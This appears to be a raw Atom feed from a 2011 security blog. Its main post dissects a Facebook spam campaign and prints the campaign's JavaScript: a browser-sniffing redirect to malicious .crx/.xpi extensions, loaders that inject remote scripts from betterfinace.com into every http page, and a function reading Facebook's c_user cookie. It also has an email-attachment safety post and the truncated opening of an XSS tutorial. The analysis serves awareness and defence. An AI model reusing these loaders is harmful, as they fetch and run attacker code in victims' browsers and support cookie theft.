Facebook spam.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;It was a browser vulnerability which was floating around for some days. Fortunately only Crome and safari were affected by that attack and it has been fixed now. 
Companies try real hard to fix all holes. But&amp;nbsp;ultimately the security lies in you.&lt;br /&gt;&lt;br /&gt;The recent spam is clearly the best spam ever flooded the social platform. It has been&amp;nbsp;crafted&amp;nbsp;very nicely and&amp;nbsp;trickly.&amp;nbsp; Lets&amp;nbsp;demystify&amp;nbsp;the spam and dig deeper into how the creators built this yet another headache for facebook. This time the target have been Firefox and Crome users.&lt;br /&gt;&lt;br /&gt;As usual once you click on the malicious link, you will be asked to share it with your friends before you can watch. Here lies the first trap. Once you share it, you are pushed out of the platform to a blogspot link where you will be asked to download a plugin before you can watch the video. Even the plugin has been named as &quot;youtube premium plugin&quot;(Hats of to the thinker of this name :-) ). Look at the picture below. There are 3 things to notice in this.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-G8plQ_DSaEE/TuZq5uNEBuI/AAAAAAAAA9w/0UjUwkQDPDU/s1600/spam1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;364&quot; src=&quot;http://2.bp.blogspot.com/-G8plQ_DSaEE/TuZq5uNEBuI/AAAAAAAAA9w/0UjUwkQDPDU/s640/spam1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Once you share this link on your profile, you will be redirected to a link outside the platform. Once the spammer or hacker succeeds you in dragging out of the platform, the real fun begins for him.&lt;br /&gt;So the first thing to notice is the blogspot link which surely does not belong to facebook. The next thing to notice is the error message. This error message is a fake one. Infact the entire flash error generated looks like a error but it is only the use of image and text. 
The black background that you see is a simple html canvas. The red smily face that you see is an image and the link &quot;install plugin&quot; is a simple hyperlink created with html. Look at the neatness with which spammer has used simple html to look like a missing pluging error.&lt;br /&gt;Now coming to the 3rd thing. Look at the image in the third part and notice the text written on its right hand side. Do you see any relation? A Girl showing somthing(which you might be dieing to see) and the text says &quot;Premium property-B&#39;lore. Obviously the property is premium in the image as well.&lt;br /&gt;Actually the image has got nothing to do with the text. The text is a simple advertisement and the spammer has neatly added a video thumbnail so as to make it appear as the link to this video. Once you click that link, obviously you will not see that premium property which you wanted to and inturn the spammer will make pocket money through add clicks.&lt;br /&gt;There is one more thing to look at. (this one is real fun!). Look at the image.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-tvbk6IJ4M3Y/TuZt3qZ1jbI/AAAAAAAAA94/MBHr0lGY4RE/s1600/spam2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;332&quot; src=&quot;http://1.bp.blogspot.com/-tvbk6IJ4M3Y/TuZt3qZ1jbI/AAAAAAAAA94/MBHr0lGY4RE/s640/spam2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Just below the addvertisement, you will find the facebook social plugin for adding comments. Well its a fake plugin simply designed by HTML. Even the comments gives you message that in order to view this video you will have to share it first. This is Social Engineering at its best.&lt;br /&gt;&lt;br /&gt;Now moving ahead with the spam. 
What happens when you click the link &quot;install plugin&quot;?&lt;br /&gt;&lt;br /&gt;The first thing that happens is that a hidden javascript executes and checks your browser type from the user-agent string. It checks whether you are using Chrome or Firefox so that it can redirect you to the respective link to&amp;nbsp;download&amp;nbsp;the extension.&lt;br /&gt;If you are using Chrome then you will be redirected to&amp;nbsp;http://betterfinace.com/youtube.crx and if you are using Firefox then you will be redirected to&amp;nbsp;http://betterfinace.com/youtube.xpi . crx is the file extension for Chrome plugins and xpi for Firefox.&lt;br /&gt;Here is the javascript which performs this task:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var is_chrome = navigator.userAgent.toLowerCase().indexOf(&#39;chrome&#39;) &amp;gt; -1;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var is_firefox = navigator.userAgent.toLowerCase().indexOf(&#39;firefox&#39;) &amp;gt; -1;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function instalar(){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;if (is_chrome){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;window.open(&quot;http://betterfinace.com/youtube.crx&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;else if(is_firefox){&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;var params = {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;Youtube Extension&quot;: {&lt;/span&gt;&lt;br /&gt;&lt;span 
class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;URL: &quot;http://betterfinace.com/youtube.xpi&quot;,&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;toString: function () { return this.URL; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;};&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the download for the plugin will start after finding your browser type. here I am using firefox as an example.&lt;br /&gt;Firefox will prompt you for download along with a warning that it is an untrusted plugin.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-4Ixl3OnsRBM/TuZv0779gaI/AAAAAAAAA-A/-i9lko8FFsw/s1600/spam3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;http://1.bp.blogspot.com/-4Ixl3OnsRBM/TuZv0779gaI/AAAAAAAAA-A/-i9lko8FFsw/s320/spam3.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;But how can we let go premium youtube plugin. So we will install it. Now in order to check what this plugin is actually ment for, we will have to decode the .xpi extension. If you open the .xpi extension then you will find lots of PK and JSPK texts which means that it is simply a compressed file. 
So rename it to .zip or .rar and then decompress it to view the content of the file.&lt;br /&gt;I found the following javascripts in the file.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-8skbEHP9BD4/TuZwmRb7T7I/AAAAAAAAA-I/Aq2S0BbTLgM/s1600/spam4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;http://4.bp.blogspot.com/-8skbEHP9BD4/TuZwmRb7T7I/AAAAAAAAA-I/Aq2S0BbTLgM/s640/spam4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The presence of so many javascripts is enough to identify what this plugin is all about. Basically these scripts contain a lot of things. This spam has been designed to attack the user in every possible way. It adds malware, steals facebook cookies from the victim&#39;s system, adds a JS trojan and what not. Let us dig out each of them.&lt;br /&gt;prefman.js and script-compiler.js are required scripts for building Firefox plugins. The only script to look for is youtube.js. It contains the hidden secret of this plugin. 
Give a look at the code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;loadScript_you();&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function loadScript_you() {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;if (&#39;https:&#39; == document.location.protocol) return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;var s = document.createElement(&#39;script&#39;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;s.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;s.setAttribute(&quot;src&quot;, &quot;http://betterfinace.com/script.js&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;var head=document.getElementsByTagName(&quot;head&quot;)[0];&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;if( head==null) return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: 
pre;&quot;&gt; &lt;/span&gt;head.appendChild(s);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;return true;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The first thing: if you are browsing over https, this loader leaves the page alone. The check on document.location.protocol makes the function return before the script element is created. On any http page, the browser appends the element to the page head and then fetches and runs http://betterfinace.com/script.js. Now the question is what does this external script do?&lt;br /&gt;Let&#39;s visit the link to analyse the script deeply.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function addScript() {&lt;br /&gt; var s = document.createElement(&#39;script&#39;);&lt;br /&gt; s.setAttribute(&quot;type&quot;, &quot;text/javascript&quot;);&lt;br /&gt; s.setAttribute(&quot;src&quot;, &quot;http://betterfinace.com/extra.js&quot;);&lt;br /&gt; var a = document.getElementsByTagName(&#39;script&#39;)[0];&lt;br /&gt; if (a == null) return false;&lt;br /&gt; a.appendChild(s);&lt;br /&gt; return true&lt;br /&gt;}&lt;br /&gt;addScript();&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;You will notice a similar script again. The reason for chaining loaders like this is not clear to me; maybe there is something I am missing. One possible reason is that the real payload stays on the server, where it can be changed without touching the installed plugin. So this script also contains a link to another external javascript, extra.js, which is added to the page when the browser runs it. Let us see what is hidden in this link.&lt;br /&gt;Well, this is the script which holds all the secrets. I am still looking at this script closely. 
Some of the functions which were easy to catch were:&lt;br /&gt;&lt;br /&gt;function fb_comparte() : this function is responsible for generating the random fake plugin comments which we saw above.&lt;br /&gt;&lt;br /&gt;function readCookie(a) : got damn! a cookie reader. Since the script is injected into every http page you visit, it can read the cookies of any of them, which is what makes it usable as a cookie stealer.&lt;br /&gt;&lt;br /&gt;function setCookie(nombre, valor, caducidad) : judging by its parameter names (name, value, expiry) it sets cookies; such cookies can be used to track your internet activities.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function FBFBFB321() : the Facebook-specific part ( not again). It runs only on http facebook.com pages and reads Facebook&#39;s c_user cookie, which holds your user id. In the snippet the cookies are only used to decide whether fb_comparte() should run; nothing in these lines sends them anywhere, so any theft has to happen elsewhere in the script. Here is the snippet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;function FBFBFB321() {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; var cook = readCookie(&quot;fb_videoazs&quot;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (cook == &quot;activo&quot;) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; var user_id = readCookie(&#39;c_user&#39;);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (user_id == null) return false;&lt;/span&gt;&lt;br /&gt;&lt;span 
class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cook = readCookie(&quot;fb_videobzs_&quot; + user_id);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (cook == &quot;activo&quot;) {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; setTimeout(function () {&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; fb_comparte();&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }, 2000);&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return true;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp; &amp;nbsp; return false;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are some other scripts too but I am too tired now so want to end this post.&lt;br /&gt;Time and again facebook has been hit by such spams. We need to aware of what we do on facebook. 
Think before you click, before you share.&lt;br /&gt;The spam is still active on the internet so you can go ahead and try out your own research. Facebook spams are a great tool to learn. You really get to know the tricks used by hackers and spammers to make you their pray. Hope you enjoyed my efforts. Time to watch out some premium property ;-) .&lt;br /&gt;Do add your comments and&amp;nbsp;suggestions.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8416719529555694222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html#comment-form' title='24 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8416719529555694222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8416719529555694222'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html' title='&quot;It Happens on Live television&quot; Facebook spam demystified - A completely new form of Spam'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s72-c/download" height="72" 
width="72"/><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-4125872779657469709</id><published>2011-12-12T23:21:00.000+05:30</published><updated>2011-12-12T23:21:42.309+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="email hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Why Email attachments can be dangerous?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s1600/mail.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;158&quot; src=&quot;http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s200/mail.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Festive season is on. Online e-commerce sites are busy attracting users. Similarly Spammers are also prepared to utilize the season for spreading spam and malwares. Recently I got a mail from Coca Cola(spam ofcorse) which said that I won lots of dollars( it ws so much that I dont remember the exact amount). It had a malicious pdf attachment. Hiding malicious codes inside pdf has become a prime target to bypass email filters. 
So I thought of writing an article on malicious email attachments.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Why can email attachments be dangerous?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Some of the characteristics that make email attachments convenient and popular are also the ones that make them a common tool for attackers:&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email is easily circulated - Forwarding email is so simple that viruses can quickly infect many machines. Most viruses don&#39;t even require users to forward the email—they scan a users&#39; computer for email addresses and automatically send the infected message to all of the addresses they find. Attackers take advantage of the reality that most users will automatically trust and open any message that comes from someone they know.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email programs try to address all users&#39; needs - Almost any type of file can be attached to an email message, so attackers have more freedom with the types of viruses they can send.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Email programs offer many &quot;user-friendly&quot; features - Some email programs have the option to automatically download email attachments, which immediately exposes your computer to any viruses within the attachments.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;What steps can you take to protect yourself and others in your address book?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Be wary of unsolicited attachments, even from people you know - Just because an email message looks like it came 
from your mom, grandma, or boss doesn&#39;t mean that it did. Many viruses can &quot;spoof&quot; the return address, making it look like the message came from someone else. If you can, check with the person who supposedly sent the message to make sure it&#39;s legitimate before opening any attachments. This includes email messages that appear to be from your ISP or software vendor and claim to include patches or anti-virus software. ISPs and software vendors do not send patches or software in email.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Keep software up to date - Install software patches so that attackers can&#39;t take advantage of known problems or vulnerabilities. Many operating systems offer automatic updates. If this option is available, you should enable it.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Trust your instincts - If an email or email attachment seems suspicious, don&#39;t open it, even if your anti-virus software indicates that the message is clean. Attackers are constantly releasing new viruses, and the anti-virus software might not have the signature. At the very least, contact the person who supposedly sent the message to make sure it&#39;s legitimate before you open the attachment. However, especially in the case of forwards, even messages sent by a legitimate sender might contain a virus. If something about the email or the attachment makes you uncomfortable, there may be a good reason. 
Don&#39;t let your curiosity put your computer at risk.&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Save and scan any attachments before opening them - If you have to open an attachment before you can verify the source, take the following steps:&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Be sure the signatures in your anti-virus software are up to date&lt;/div&gt;&lt;div&gt;Save the file to your computer or a disk.&lt;/div&gt;&lt;div&gt;Manually scan the file using your anti-virus software.&lt;/div&gt;&lt;div&gt;If the file is clean and doesn&#39;t seem suspicious, go ahead and open it.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Apart from these there are some of my older posts which can be useful for you:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/04/4-gmail-tips-you-should-know.html&quot; target=&quot;_blank&quot;&gt;4 Gmail tips that you should know&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2010/10/phishing-can-your-browser-protect-you.html&quot; target=&quot;_blank&quot;&gt;Phishing - Can your browser protect you?&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;DARKLORD!!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/4125872779657469709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/why-email-attachments-can-be-dangerous.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/4125872779657469709'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/7708828398385990720/posts/default/4125872779657469709'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/why-email-attachments-can-be-dangerous.html' title='Why Email attachments can be dangerous?'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-hWFL7shHTMU/TuY9-3QLxOI/AAAAAAAAA9o/_pe6K2ByLWk/s72-c/mail.jpg" height="72" width="72"/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1828740309089422641</id><published>2011-12-11T23:04:00.000+05:30</published><updated>2011-12-11T23:06:30.704+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><category scheme="http://www.blogger.com/atom/ns#" term="xss attack"/><title type='text'>Cross site scripting(XSS) Cheat Sheet - Readers Choice!!</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 
href=&quot;http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. These days I am on an XSS rampage. I recently posted an article on &lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html&quot; target=&quot;_blank&quot;&gt;XSS vulnerability in Babylon search&lt;/a&gt;. Since then I got several request from the readers to post a quick article on cross site scriptting. This tutorial will be divided into two parts. In the first part I will cover the basics of XSS and how the attack vector is implemented. In the next tutorial we will discuss some techniques by which we can prevent XSS attacks.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;OWASP lists &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;sql injection&lt;/a&gt; and XSS as the two most common vulnerabilities in web pages and web apps. We have covered SQL injection quiet extensively so I decided to write on xss.&lt;br /&gt;&lt;br /&gt;Cross Site Scripting or XSS &amp;nbsp;is a web application attack that involves injecting a piece of malicious code into the vulnerable web application/web page. The attacker injects a client side script mainly through the web browser to reach the other users of the particular website. 
